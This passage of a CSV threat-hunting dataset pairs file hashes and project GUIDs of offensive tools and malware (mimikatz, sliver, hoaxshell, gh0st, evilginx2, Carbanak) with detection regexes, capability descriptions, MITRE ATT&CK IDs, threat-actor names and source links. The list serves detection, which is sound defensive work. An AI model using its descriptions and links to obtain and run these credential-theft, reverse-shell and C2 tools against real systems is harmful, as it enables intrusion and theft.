"*8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6*",".{0,1000}8093f462616ec9e222eb6dac9abcff21a6dca3075283e7daca3d209e81cb85f6.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29922" "*8099c768d5898dccca1f09370e5b171c1a9b40d8558cbe08c8bbcc23763db00e*",".{0,1000}8099c768d5898dccca1f09370e5b171c1a9b40d8558cbe08c8bbcc23763db00e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29923" "*809f540f580fc0e192a1c0432ec04105a3faf51f9d7c20f5e15423b78774052d*",".{0,1000}809f540f580fc0e192a1c0432ec04105a3faf51f9d7c20f5e15423b78774052d.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","29924" "*80a9520b464f4bd7b4747c897a66a3c41a9100cb9efcd94614e2bd053247285a*",".{0,1000}80a9520b464f4bd7b4747c897a66a3c41a9100cb9efcd94614e2bd053247285a.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","29926" "*80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4*",".{0,1000}80a9715cb597950d540961b82e1f6793af205d9de2de5e61e6b6e53fc45845b4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","29927" "*80ABA1A7-0E3E-3DB2-8EB9-D4EE1C266504*",".{0,1000}80ABA1A7\-0E3E\-3DB2\-8EB9\-D4EE1C266504.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#GUIDProject","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","29929" "*80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30*",".{0,1000}80b564a22ac44bb773a8849e33b043617348eaac203be63f87d2bd0ec75f7f30.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29932" "*80BA63A4-7D41-40E9-A722-6DD58B28BF7E*",".{0,1000}80BA63A4\-7D41\-40E9\-A722\-6DD58B28BF7E.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","29934" "*80bba5f788f3f4a7fa0e3a516fdd0dcd7eb1553065ee224090f18dec032a04cd*",".{0,1000}80bba5f788f3f4a7fa0e3a516fdd0dcd7eb1553065ee224090f18dec032a04cd.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","29935" "*80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b*",".{0,1000}80be0f50a66761674611885cf41fc742eb8291db9885ff5a08d5867ae74eac7b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29936" "*80d792752ea5235d98332ae1f26e897e7481f4d3c194b56d1a5bddbfaa043eb9*",".{0,1000}80d792752ea5235d98332ae1f26e897e7481f4d3c194b56d1a5bddbfaa043eb9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29942" "*80e3f33e222040c459c76c14ab5aebc3d2069d29ff7baa32358a4813608eaaa2*",".{0,1000}80e3f33e222040c459c76c14ab5aebc3d2069d29ff7baa32358a4813608eaaa2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29943" "*80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6*",".{0,1000}80e5d08cc3b73bf1c8e1b9ad7280936bb8d83f0a41f6fdd277e19511e3340cf6.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29944" "*80ea8260d6148c716cf35ae8d8621a41b95cf4cd5857392698f1f21f62f2cb8e*",".{0,1000}80ea8260d6148c716cf35ae8d8621a41b95cf4cd5857392698f1f21f62f2cb8e.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","29945" "*80ed17895205205c5a769d18715cb74a623cee6a5379bb8142d2c8c533c759b2*",".{0,1000}80ed17895205205c5a769d18715cb74a623cee6a5379bb8142d2c8c533c759b2.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","#filehash","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","29946" "*80f32d3706de3583f3228e9dd2d53375868308bfba3add3ae2637adba6fa392b*",".{0,1000}80f32d3706de3583f3228e9dd2d53375868308bfba3add3ae2637adba6fa392b.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29947" "*80f45afbf7b1c8a0f84fded941cec8979c27d86faea7275c0c70daab760c2908*",".{0,1000}80f45afbf7b1c8a0f84fded941cec8979c27d86faea7275c0c70daab760c2908.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29948" "*80f8454777e31fe469f71f99f2df69a00f79cbbb42699d00587133516eb90546*",".{0,1000}80f8454777e31fe469f71f99f2df69a00f79cbbb42699d00587133516eb90546.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29950" "*81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b*",".{0,1000}81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29952" 
"*81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b*",".{0,1000}81027e82ed224ca43c939b8df5f99bf13e9d2191b177ae4d339075930ab2bb5b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29953" "*810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551*",".{0,1000}810950f1d775ffa916c75a85c79bb2a46f7c7250986be7748bfae90b04b33551.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","#filehash","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","29954" 
"*810a727dfd8127c192729f6d06f0564300ada683063d0a8fd622e2b338714514*",".{0,1000}810a727dfd8127c192729f6d06f0564300ada683063d0a8fd622e2b338714514.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29955" "*810b9f7c517f7f00516340661ecaf5610b89ea25ff5261964abe067a40c474c2*",".{0,1000}810b9f7c517f7f00516340661ecaf5610b89ea25ff5261964abe067a40c474c2.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #filehash","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","29956" "*811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d*",".{0,1000}811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","29957" "*811683b1-e01c-4ef8-82d1-aa08293d3e7c*",".{0,1000}811683b1\-e01c\-4ef8\-82d1\-aa08293d3e7c.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","#GUIDproject","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","29958" "*811b4a92ff8cf7ae50e4edaa23c2d533662a8ce035ba079792bfe21e0457b19b*",".{0,1000}811b4a92ff8cf7ae50e4edaa23c2d533662a8ce035ba079792bfe21e0457b19b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29959" "*811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa*",".{0,1000}811d06dc2f9560e4d3697c2a5e2aa39f516a582c70ac88e33468810905ced6fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29960" "*812c4312270a710b3c4bf47ff75abca809aa51d78f3e8a2e6071bd31dda52c6e*",".{0,1000}812c4312270a710b3c4bf47ff75abca809aa51d78f3e8a2e6071bd31dda52c6e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29965" "*813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2*",".{0,1000}813342bc9592e0e2b5672eb84376b59e098cc45929a42c55bdc96750f2abd5f2.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29968" "*814708C9-2320-42D2-A45F-31E42DA06A94*",".{0,1000}814708C9\-2320\-42D2\-A45F\-31E42DA06A94.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#GUIDproject","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","29971" "*815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a*",".{0,1000}815533317285b5d53ee050a757d529072b9311106b24f03c79e379109718f84a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29973" "*8157255bd8b050e5875a4075e26ed8589d56083f3e944df98c3e2fa498e1bfd9*",".{0,1000}8157255bd8b050e5875a4075e26ed8589d56083f3e944df98c3e2fa498e1bfd9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29974" 
"*815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf*",".{0,1000}815dfb13e0c4d5040ffb1dde7350cc77f227b2945b01c61bf54f85eefdd182cf.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","#filehash","N/A","10","","N/A","","","","29976" "*8160fe6c7c5d98cfa69d14135b925866cf7b28689017d1883ef0b060f0777e5c*",".{0,1000}8160fe6c7c5d98cfa69d14135b925866cf7b28689017d1883ef0b060f0777e5c.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29977" "*8168c7da7b3fc4bec5fef3ad065271c250f383d202f6ff16a2d52c38135c075b*",".{0,1000}8168c7da7b3fc4bec5fef3ad065271c250f383d202f6ff16a2d52c38135c075b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29979" "*8169F27E-0314-44BB-8B89-DB3339FF51A3*",".{0,1000}8169F27E\-0314\-44BB\-8B89\-DB3339FF51A3.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name 
(Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","29980" "*816b85da5902d45e9d18f04e8f2e731719ee796e619456ef9cecf365bc79ceee*",".{0,1000}816b85da5902d45e9d18f04e8f2e731719ee796e619456ef9cecf365bc79ceee.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29981" "*816bac589fcdd14efd90df8fecfadd0b1908dcd18a3617ef9f64170fee14ad5c*",".{0,1000}816bac589fcdd14efd90df8fecfadd0b1908dcd18a3617ef9f64170fee14ad5c.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","29982" "*816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019*",".{0,1000}816d7616238958dfe0bb811a063eb3102efd82eff14408f5cab4cb5258bfd019.{0,1000}","offensive_tool_keyword","VNCPassView","recover the passwords stored by the VNC tool","T1003 - T1555 - T1081","TA0006 - TA0007","N/A","GoGoogle - 8BASE","Credential Access","https://www.nirsoft.net/utils/vnc_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29983" 
"*8173d4d17cb728e6f2c5e2ce8124ce7eb0f459dc62085bcaab786abf1f6b37a7*",".{0,1000}8173d4d17cb728e6f2c5e2ce8124ce7eb0f459dc62085bcaab786abf1f6b37a7.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","#filehash","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","29984" "*8177096d8c171e68e1ad0cfae755ad4e7fafa97ef18f5400db34ec157616623a*",".{0,1000}8177096d8c171e68e1ad0cfae755ad4e7fafa97ef18f5400db34ec157616623a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29985" "*81787aecc793198688ff37685d15c3d6a482c24548b8a42a8f5a438d2a5ef5bf*",".{0,1000}81787aecc793198688ff37685d15c3d6a482c24548b8a42a8f5a438d2a5ef5bf.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29986" 
"*81853d4c06bb62f9b8f3032d4ac6aff5839fae7c6ecfdde64a4cd6a538df5daf*",".{0,1000}81853d4c06bb62f9b8f3032d4ac6aff5839fae7c6ecfdde64a4cd6a538df5daf.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29987" "*8185f7a1072ce058afd735f5162861d439a8d81f535a2609896e19c319f25aea*",".{0,1000}8185f7a1072ce058afd735f5162861d439a8d81f535a2609896e19c319f25aea.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29988" "*8190e7ab106e460cc0e726520b8adf75122e50ce26f0b58db58827c6b6290b97*",".{0,1000}8190e7ab106e460cc0e726520b8adf75122e50ce26f0b58db58827c6b6290b97.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 